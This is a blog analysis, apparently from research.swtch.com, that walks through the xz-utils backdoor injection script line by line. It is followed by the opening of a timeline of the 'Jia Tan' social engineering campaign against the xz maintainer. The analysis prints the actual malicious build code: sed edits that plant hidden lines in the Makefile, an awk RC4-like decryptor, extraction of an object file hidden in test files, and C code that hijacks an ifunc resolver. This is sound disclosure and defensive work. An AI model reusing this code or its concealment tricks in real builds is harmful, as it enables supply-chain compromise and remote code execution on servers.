if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
</pre>
<p>
Require all the crc ifunc code (in case it has been patched out?).
<pre>if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
exit 0
fi
if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
exit 0
fi
LDv=$LD" -v"
if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Require gcc (not clang, I suppose) and GNU ld.
<pre>if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Require the backdoor-containing test files. Of course, if these files didn’t exist, it’s unclear how we obtained this script in the first place, but better safe than sorry, I suppose.
<pre>if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
eval $zrKcst
</pre>
<p>
Add a bunch of checks when the file <code>debian/rules</code> exists or <code>$RPM_ARCH</code> is set to <code>x86_64</code>. Note that we are now inside two <code>if</code> statements: the <code>config.status</code> check above, and this one (let’s call it “if #2”).
<pre>j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
z="^am__uninstall_files_from_dir = {"
if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
w="^am__install_max ="
if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
E=$z
if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
Q="^am__vpath_adj_setup ="
if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
M="^am__include = include"
if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
L="^all: all-recursive$"
if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that <code>liblzma/Makefile</code> contains all the lines that will be used as anchor points later for inserting new text into the Makefile.
<pre>if ! grep -qs "$O" libtool > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
<code>$O</code> was set at the very start of the script. This is checking that the libtool file, presumably generated during the build process, configures the compiler for a PIC (position independent code) build.
<pre>eval $zrKcTy
b="am__test = $U"
</pre>
<p>
<code>$U</code> was also set at the start of the script: <code>U="bad-3-corrupt_lzma2.xz"</code>. Real work is starting!
<pre>sed -i "/$j/i$b" src/liblzma/Makefile || true
</pre>
<p>
<code>sed -i</code> runs an in-place modification of the input file, in this case <code>liblzma/Makefile</code>. Specifically, find the <code>ACLOCAL_M4</code> line we grepped for earlier (<code>/$j/</code>) and insert the <code>am__test</code> setting from <code>$b</code> (<code>i$b</code>).
<pre>d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`
b="am__strip_prefix = $d"
sed -i "/$w/i$b" src/liblzma/Makefile || true
</pre>
<p>
Shell quoting inside a quoted string inside a Makefile really is something special. This is escaping the backslashes in the tr command enough times that it will work to insert them into the Makefile after the <code>am__install_max</code> line (<code>$w</code>).
<pre>b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
sed -i "/$E/i$b" src/liblzma/Makefile || true
b="\$(top_srcdir)/tests/files/\$(am__test)"
s="am__test_dir=$b"
sed -i "/$Q/i$s" src/liblzma/Makefile || true
</pre>
<p>
More added lines. It’s worth stopping for a moment to look at what’s happened so far. The script has added these lines to <code>src/liblzma/Makefile</code>:
<pre>am__test = bad-3-corrupt_lzma2.xz
am__strip_prefix = tr "\\t \\-_" " \\t_\\-"
am__dist_setup = $(am_strip_prefix) | xz -d 2>/dev/null | $(SHELL)
am__test_dir = $(top_srcdir)/tests/files/$(am__test)
</pre>
<p>
<br>
These look plausible but fall apart under closer examination: for example, <code>am__test_dir</code> is a file, not a directory. The goal here seems to be that after <code>configure</code> has run, the generated <code>Makefile</code> still looks plausibly inscrutable. And the lines have been added in scattered places throughout the <code>Makefile</code>; no one will see them all next to each other like in this display. Back to the script:
<pre>h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true
</pre>
<p>
<br>
Add <code>liblzma_la_LDFLAGS += -Wl,--sort-section=name,-X</code> to the Makefile. If the <code>LDFLAGS</code> do not already say <code>-z,now</code> or <code>-Wl,now</code>, add <code>-z,now</code>.
<p>
The “<code>-Wl,now</code>” forces <code>LD_BIND_NOW</code> behavior, in which the dynamic loader resolves all symbols at program startup time. One reason this is normally done is for security: it makes sure that the global offset table and procedure linkage tables can be marked read-only early in process startup, so that buffer overflows or write-after-free bugs cannot target those tables. However, it also has the effect of running GNU indirect function (ifunc) resolvers at startup during that resolution process, and the backdoor arranges to be called from one of those. This early invocation of the backdoor setup lets it run while the tables are still writable, allowing the backdoor to replace the entry for <code>RSA_public_decrypt</code> with its own version. But we are getting ahead of ourselves. Back to the script:
<pre>sed -i "s/$O/$C/g" libtool || true
</pre>
<p>
We checked earlier that the libtool file said <code>pic_flag=" -fPIC -DPIC"</code>. The sed command changes it to read <code>pic_flag=" -fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"</code>.
<p>
It is not clear why these additional flags are important, but in general they disable linker optimizations that could plausibly get in the way of subterfuge.
<pre>k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
sed -i "s/$u/$k/" src/liblzma/Makefile || true
l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
export top_srcdir='\$(top_srcdir)'; \\\\\n\
export CC='\$(CC)'; \\\\\n\
export DEFS='\$(DEFS)'; \\\\\n\
export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
export INCLUDES='\$(INCLUDES)'; \\\\\n\
export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
export CFLAGS='\$(CFLAGS)'; \\\\\n\
export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
export libdir='\$(libdir)'; \\\\\n\
export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1";
sed -i "/$m/i$l" src/liblzma/Makefile || true
eval $zrKcHD
</pre>
<p>
Shell quoting continues to be trippy, but we’ve reached the final change. This adds the line
<pre>AM_V_CCLD = @echo -n $(LTDEPS); $(am__v_CCLD_$(V))
</pre>
<p>
to one place in the Makefile, and then adds a long script that sets up some variables, entirely as misdirection, that ends with
<pre>sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1
</pre>
<p>
The <code>sed rpath</code> command is just as much an obfuscated <code>cat</code> as <code>sed "r\n"</code> was, but <code>-rpath</code> is a very common linker flag, so at first glance you might not notice it’s next to the wrong command. Recalling the <code>am__test</code> and related lines added above, this pipeline ends up being equivalent to:
<pre>cat ./tests/files/bad-3-corrupt_lzma2.xz |
tr "\t \-_" " \t_\-" |
xz -d |
/bin/sh
</pre>
<p>
Our old friend! We know what this does, though. It runs the very script we are currently reading in this post. <a href="https://research.swtch.com/zip">How recursive!</a>
<a class=anchor href="#make"><h2 id="make">Make</h2></a>
<p>
Instead of running during <code>configure</code> in the tarball root directory, let’s mentally re-execute the script as it would run during <code>make</code> in the <code>liblzma</code> directory. In that context, the variables at the top have been set, but all the editing we just considered was skipped over by “if #1” not finding <code>./config.status</code>. Now let’s keep executing the script.
<pre>fi
</pre>
<p>
That <code>fi</code> closes “if #2”, which checked for a Debian or RPM build. The upcoming <code>elif</code> continues “if #1”, which checked for config.status, meaning now we are executing the part of the script that matters when run during <code>make</code> in the <code>liblzma</code> directory:
<pre>elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
</pre>
<p>
If we see the built objects for the crc code, we are running as part of <code>make</code>. Run the following code.
<pre># Entirely new in 5.6.1
vs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2>/dev/null`
if test "x$vs" != "x" > /dev/null 2>&1;then
f1=`echo $vs | cut -d: -f1`
if test "x$f1" != "x" > /dev/null 2>&1;then
start=`expr $(echo $vs | cut -d: -f2) + 7`
ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2>/dev/null`
if test "x$ve" != "x" > /dev/null 2>&1;then
f2=`echo $ve | cut -d: -f1`
if test "x$f2" != "x" > /dev/null 2>&1;then
[ ! "x$f2" = "x$f1" ] && exit 0
[ ! -f $f1 ] && exit 0
end=`expr $(echo $ve | cut -d: -f2) - $start`
eval `cat $f1 | tail -c +${start} | head -c +${end} |
tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
xz -F raw --lzma2 -dc`
fi
fi
fi
fi
</pre>
<p>
We start this section with another extension hook. This time the magic strings are <code>'jV!.^%'</code> and <code>'%.R.1Z'</code>. As before, there are no test files with these strings. This was for future extensibility.
<p>
On to the code shared with 5.6.0:
<pre>eval $zrKcKQ
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
exit 0
fi
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
exit 0
fi
if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
</pre>
<p>
Check that the ifunc-enabled CRC source files look right. Interestingly, Lasse Collin renamed <code>crc_clmul.c</code> to <code>crc_x86_clmul.h</code> <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea">on 2024-01-11</a>. One has to assume that the person or team behind “Jia Tan” had been working on all this code well before then and that the first version checked <code>crc_clmul.c</code>. They were probably very annoyed when Lasse Collin accidentally broke their in-development backdoor by cleaning up the file names!
<pre>if ! grep -qs "$C" ../../libtool; then
exit 0
fi
if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that the build configuration has the extra flags we added before.
<pre>if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then
exit 0
fi
</pre>
<p>
Check that no one has added <code>lazy</code> to the linker options, which might override the <code>-Wl,now</code>. (This code really needs to run before the tables it patches get marked read-only!)
<pre>N=0
W=0
Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4`
eval $zrKcjv
if test -z "$Y"; then
N=0
W=88664
else
N=88664
W=0
fi
</pre>
<p>
This is selecting between two different offset values depending on the content of <code>gettext.m4</code>. The distributed xz tarballs do not contain that string in <code>gettext.m4</code> (it does appear in <code>build-to-host.m4</code>), so the <code>grep</code> finds nothing, <code>$Y</code> is the empty string, and the true case of the <code>if</code> executes: <code>N=0</code> and <code>W=88792</code>.
<pre>xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" |
</pre>
<p>
I inserted a line break here. Remember the “corrupt” test file script set <code>i</code> to the large head pipeline? It’s still set here, being used inside the script extracted from that pipeline. Before, the pipeline extracted 33,707 bytes and then we used the final 31,233 bytes. Now we are using the entire thing, which probably means just the prefix that we skipped before. The sed command is inserting a newline after every byte of that output, setting up for piping into the remainder of the command line:
<pre>LC_ALL=C awk '
BEGIN{
FS="\n";RS="\n";ORS="";m=256;
for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}
i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}
}
{
v=t["x" (NF<1?RS:$1)];
i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];
printf "%c",(v+k)%m
}' |
</pre>
<p>
I inserted another line break here. What is this? <a href="https://twitter.com/nugxperience/status/1773906926503591970">@nugxperience on Twitter recognized it</a> as an RC4-like decryption function, implemented in awk! Apparently the <code>tr</code>-based substitution cipher wasn’t secure enough for this step. This is the 5.6.1 version; the 5.6.0 version is the same except that the second loop counts to 4096 instead of 8192.
<p>
Back to the script:
<pre>xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
</pre>
<p>
We finally made it to the end of this long line. The decrypted output is piped through xz to decompress it; the <code>--single-stream</code> flag says to stop at the end of the first xz EOF marker instead of looking for additional files on standard input. This avoids reading the section of the input that we extracted with the <code>tail</code> command before. Then the decompressed data is piped through a <code>head</code> pair that extracts either the full 88,792 byte input or zero bytes, depending on <code>gettext.m4</code> from before, and writes it to <code>liblzma_la-crc64-fast.o</code>. In our build, we are taking the full input.
<pre>if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
</pre>
<p>
If all that failed, stop quietly.
<pre>cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
</pre>
<p>
Wait what? Oh! Notice the two different file names <code>crc64_fast</code> versus <code>crc64-fast</code>. And neither of these is the one we just extracted. These are in <code>.libs/</code>, and the one we extracted is in the current directory. This is backing up the real file (the underscored one) into a file with a very similar name (the hyphenated one).
<pre>V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) &&
defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) &&
(defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\n
extern int _get_cpuid(int, void*, void*, void*, void*, void*);\n
static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4];
success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
return success && (r[2] & ecx_mask) == ecx_mask; }\n
#else\n
#define _is_arch_extension_supported is_arch_extension_supported'
</pre>
<p>
This string <code>$V</code> begins with “<code>#endif</code>”, which is never a good sign. Let’s move on for now, but we’ll take a closer look at that text shortly.
<pre>eval $yosA
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \
$CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
</pre>
<p>
This <code>if</code> statement is running a pipeline of sed commands piped into <code>$CC</code> with the arguments <code>liblzma_la-crc64-fast.o</code> (adding that object as an input to the compiler) and <code>-x</code> <code>c</code> <code>-</code> (compile a C program from standard input). That is, it rebuilds an edited copy of <code>crc64_fast.c</code> (a real xz source file) and merges the extracted malicious <code>.o</code> file into the resulting object, overwriting the underscored real object file that would have been built originally for <code>crc64_fast.c</code>. The <code>sed</code> <code>1i</code> tells the compiler the file name to record in debug info, since the compiler is reading standard input—very tidy! But what are the edits?
<p>
The file starts out looking like:
<pre>...
#if defined(CRC_X86_CLMUL)
# define BUILDING_CRC64_CLMUL
# include "crc_x86_clmul.h"
#endif
...
static crc64_func_type
crc64_resolve(void)
{
return is_arch_extension_supported()
? &crc64_arch_optimized : &crc64_generic;
}
</pre>
<p>
The sed commands add an <code>_</code> prefix to the name of the function in the return condition, and then add <code>$V</code> after the <code>include</code> line, producing (with reformatting of the C code):
<pre># 0 "path/to/src/liblzma/check/crc64_fast.c"
...
#if defined(CRC_X86_CLMUL)
# define BUILDING_CRC64_CLMUL
# include "crc_x86_clmul.h"
#endif
#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && \
defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && \
(defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))
extern int _get_cpuid(int, void*, void*, void*, void*, void*);
static inline bool _is_arch_extension_supported(void) {
int success = 1;
uint32_t r[4];
success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
return success && (r[2] & ecx_mask) == ecx_mask;
}
#else
#define _is_arch_extension_supported is_arch_extension_supported
#endif
...
static crc64_func_type
crc64_resolve(void)
{
return _is_arch_extension_supported()
? &crc64_arch_optimized : &crc64_generic;
}
</pre>
<p>
That is, the crc64_resolve function, which is the ifunc resolver that gets run early in dynamic loading, before the GOT and PLT have been marked read-only, is now calling the newly inserted <code>_is_arch_extension_supported</code>, which calls <code>_get_cpuid</code>. This still looks like plausible code, since this is pretty similar to <a href="https://git.tukaani.org/?p=xz.git;a=blob;f=src/liblzma/check/crc_x86_clmul.h;h=ae66ca9f8c710fd84cd8b0e6e52e7bbfb7df8c0f;hb=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429#l388">the real is_arch_extension_supported</a>. But <code>_get_cpuid</code> is provided by the backdoor .o, and it does a lot more before returning the cpuid information. In particular it rewrites the GOT and PLT to hijack calls to RSA_public_decrypt.
<p>
But let’s get back to the shell script, which is still running from inside <code>src/liblzma/Makefile</code> and just successfully inserted the backdoor into <code>.libs/liblzma_la-crc64_fast.o</code>. We are now in the <code>if</code> compiler success case:
<pre>cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
eval $BPep
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \
sed "/include \"crc32_arm64.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \
$CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then
</pre>
<p>
This does the same thing for <code>crc32_fast.c</code>, except it doesn’t add the backdoored object code. We don’t want two copies of that in the build. It is unclear why the script bothers to intercept both the crc32 and crc64 ifuncs; either one should have sufficed. Perhaps they wanted the dispatch code for both to look similar in a debugger. Now we’re in the doubly nested <code>if</code> compiler success case:
<pre>eval $RgYB
if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
</pre>
<p>
If we can relink the .la file, then...
<pre>if test ! -f .libs/liblzma.so; then
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
<br>
If the relink succeeded but didn’t write the file, assume it failed and restore the backups.
<pre>rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
</pre>
<p>
No matter what, remove the libraries. (The <code>Makefile</code> link step is presumably going to happen next and recreate them.)
<pre>else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the <code>else</code> for the link failing. Restore from backups.
<pre>rm -f .libs/liblzma_la-crc32-fast.o || true
rm -f .libs/liblzma_la-crc64-fast.o || true
</pre>
<p>
Now we are in the inner compiler success case. Delete backups.
<pre>else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the else for the crc32 compilation failing. Restore from backups.
<pre>else
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
</pre>
<p>
This is the else for the crc64 compilation failing. Restore from backup. (This is not the cleanest shell script in the world!)
<pre>rm -f liblzma_la-crc64-fast.o || true
</pre>
<p>
Now we are at the end of the Makefile section of the script. Delete the backup.
<pre>fi
eval $DHLd
$
</pre>
<p>
Close the “<code>elif</code> we’re in a Makefile”, one more extension point/debug print, and we’re done!
The script has injected the object file into the objects built during <code>make</code>, leaving no trace behind.
Timeline of the xz open source attacktag:research.swtch.com,2012:research.swtch.com/xz-timeline2024-04-01T23:23:00-04:002024-04-03T09:25:00-04:00A detailed timeline of the xz open source attack, from 2021 to 2024.
<p>
Over a period of over two years, an attacker using the name “Jia Tan”
worked as a diligent, effective contributor to the xz compression library,
eventually being granted commit access and maintainership.
Using that access, they installed a very subtle, carefully hidden backdoor into liblzma,
a part of xz that also happens to be a dependency of OpenSSH sshd
on Debian, Ubuntu, and Fedora, and other systemd-based Linux systems that patched sshd to link libsystemd.
(Note that this does not include systems like Arch Linux, Gentoo, and NixOS, which do not patch sshd.)
That backdoor watches for the attacker sending hidden commands at the start of an SSH session,
giving the attacker the ability to run an arbitrary command on the target system without logging in:
unauthenticated, targeted remote code execution.
<p>
The attack was <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">publicly disclosed on March 29, 2024</a> and
appears to be the first serious known supply chain attack on widely used open source software.
It marks a watershed moment in open source supply chain security, for better or worse.
<p>
This post is a detailed timeline that I have constructed of the
social engineering aspect of the attack, which appears to date
back to late 2021.
(See also my <a href="xz-script">analysis of the attack script</a>.)
<p>
Corrections or additions welcome on <a href="https://bsky.app/profile/swtch.com/post/3kp4my7wdom2q">Bluesky</a>, <a href="https://hachyderm.io/@rsc/112199506755478946">Mastodon</a>, or <a href="mailto:rsc@swtch.com">email</a>.
<a class=anchor href="#prologue"><h2 id="prologue">Prologue</h2></a>
<p>
<b>2005–2008</b>: <a href="https://github.com/kobolabs/liblzma/blob/87b7682ce4b1c849504e2b3641cebaad62aaef87/doc/history.txt">Lasse Collin, with help from others</a>, designs the .xz file format using the LZMA compression algorithm, which compresses files to about 70% of what gzip did [1]. Over time this format becomes widely used for compressing tar files, Linux kernel images, and many other uses.
<a class=anchor href="#jia_tan_arrives_on_scene_with_supporting_cast"><h2 id="jia_tan_arrives_on_scene_with_supporting_cast">Jia Tan arrives on scene, with supporting cast</h2></a>
<p>
<b>2021-10-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html">first, innocuous patch</a> to the xz-devel mailing list, adding “.editorconfig” file.
<p>
<b>2021-11-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00519.html">second innocuous patch</a> to the xz-devel mailing list, fixing an apparent reproducible build problem. More patches that seem (even in retrospect) to be fine follow.
<p>
<b>2022-02-07</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6468f7e41a8e9c611e4ba8d34e2175c5dacdbeb4">first commit with “jiat0218@gmail.com” as author in git metadata</a> (“liblzma: Add NULL checks to LZMA and LZMA2 properties encoders”).
<p>
<b>2022-04-19</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00553.html">yet another innocuous patch</a> to the xz-devel mailing list.
<p>
<b>2022-04-22</b>: “Jigar Kumar” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html">first of a few emails</a> complaining about Jia Tan’s patch not landing. (“Patches spend years on this mailing list. There is no reason to think anything is coming soon.”) At this point, Lasse Collin has already landed four of Jia Tan’s patches, marked by “Thanks to Jia Tan” in the commit message.
<p>
<b>2022-05-19</b>: “Dennis Ens” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html">mail to xz-devel</a> asking if XZ for Java is maintained.
<p>
<b>2022-05-19</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00563.html">replies</a> apologizing for slowness and adds “Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils. It’s clear that my resources are too limited (thus the many emails waiting for replies) so something has to change in the long term.”
<p>
<b>2022-05-27</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html">pressure email</a> to patch thread. “Over 1 month and no closer to being merged. Not a surprise.”
<p>
<b>2022-06-07</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html">pressure email</a> to Java thread. “Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.”
<p>
<b>2022-06-08</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">pushes back</a>. “I haven’t lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things. Recently I’ve worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we’ll see. It’s also good to keep in mind that this is an unpaid hobby project.”
<p>
<b>2022-06-10</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=aa75c5563a760aea3aa23d997d519e702e82726b">first commit with “Jia Tan” as author in git metadata</a> (“Tests: Created tests for hardware functions”). Note also that there was one earlier commit on 2022-02-07 that had the full name set only to jiat75.
<p>
<b>2022-06-14</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=0354d6cce3ff98ea6f927107baf216253f6ce2bb">only commit with “jiat75@gmail.com” as author</a>. This could have been a temporary git misconfiguration on Jia Tan’s side forgetting their fake email address.
<p>
<b>2022-06-14</b>: Jugar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">pressure email</a>. “With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?”
<p>
<b>2022-06-21</b>: Dennis Ens sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html">pressure email</a>. “I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C? Trying to maintain both means that neither are maintained well.”
<p>
<b>2022-06-22</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html">pressure email</a> to C patch thread. “Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?”
<p>
<b>2022-06-29</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00571.html">replies</a>: “As I have hinted in earlier emails, Jia Tan may have a bigger role in the project in the future. He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils.”
<a class=anchor href="#jia_tan_becomes_maintainer"><h2 id="jia_tan_becomes_maintainer">Jia Tan becomes maintainer</h2></a>
<p>
At this point Lasse seems to have started working even more closely with Jia Tan. Brian Krebs <a href="https://infosec.exchange/@briankrebs/112197305365490518">observes</a> that many of these email addresses never appeared elsewhere on the internet, even in data breaches (nor again in xz-devel). It seems likely that they were fakes created to push Lasse to give Jia more control. It worked. Over the next few months, Jia started replying to threads on xz-devel authoritatively about the upcoming 5.4.0 release.
<p>
<b>2022-09-27</b>: Jia Tan gives <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00593.html">release summary</a> for 5.4.0. (“The 5.4.0 release that will contain the multi threaded decoder is planned for December. The list of open issues related to 5..4.0 [sic] in general that I am tracking are...”)
<p>
<b>2022-10-28</b>: Jia Tan <a href="https://github.com/JiaT75?tab=overview&from=2022-10-01&to=2022-10-31">added to the Tukaani organization</a> on GitHub. Being an organization member does not imply any special access, but it is a necessary step before granting maintainer access.
<p>
<b>2022-11-30</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=764955e2d4f2a5e8d6d6fec63af694f799e050e7">changes bug report email</a> from his personal address to an alias that goes to him and Jia Tan, notes in README that “the project maintainers Lasse Collin and Jia Tan can be reached via <a href="mailto:xz@tukaani.org">xz@tukaani.org</a>”.
<p>
<b>2022-12-30</b>: Jia Tan merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=8ace358d65059152d9a1f43f4770170d29d35754">a batch of commits directly into the xz repo</a> (“CMake: Update .gitignore for CMake artifacts from in source build”). At this point we know they have commit access. Interestingly, a <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=799ead162de63b8400733603d3abcd2e1977bdca">few commits later</a> in the same batch is the only commit with a different full name: “Jia Cheong Tan”.
<p>
